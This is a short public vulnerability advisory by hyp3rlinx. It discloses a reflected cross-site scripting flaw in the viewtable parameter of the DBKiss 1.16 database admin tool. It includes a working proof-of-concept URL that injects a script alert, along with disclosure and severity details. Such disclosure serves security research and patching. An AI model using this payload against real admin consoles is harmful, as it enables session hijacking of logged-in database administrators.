# Exploit Title: DBKiss Database Admin XSS Exploit # Google Dork: intitle: XSS # Date: May 13, 2015 # Exploit Author: John Page (hyp3rlinx) # Website: hyp3rlinx.altervista.org # Vendor Homepage: code.google.com/p/dbkiss/ # Software Link: code.google.com/p/dbkiss/ # Version:1.16 # Tested on: Windows 7 using XAMPP # Category: XSS # CVE : NA Source: http://hyp3rlinx.altervista.org/advisories/AS-DBKISS0513.txt Product: DBKiss Database administration tool for MySQL, PostgreSQL and SQLite. Advisory Information: ===================================================== DBKiss 1.16 is vulnerable to XSS attacks. Exploit code: ============== http://localhost/dbkiss_1.16/dbkiss.php?viewtable=%27%3Cscript%3Ealert%28%22XSS%20By%20Hyp3rlinx\n05112015%22%29%3C/script%3E// Disclosure Timeline: ================================== Vendor Notification NA May 13, 2015: Public Disclosure Severity Level: =============== High Description: ============ Request Method(s): [+] GET Vulnerable Product: [+] DBKiss 1.16 Vulnerable Parameter(s): [+] viewtable=[XSS] Affected Area(s): [+] Admin console of currently logged in user. ============================== (hyp3rlinx)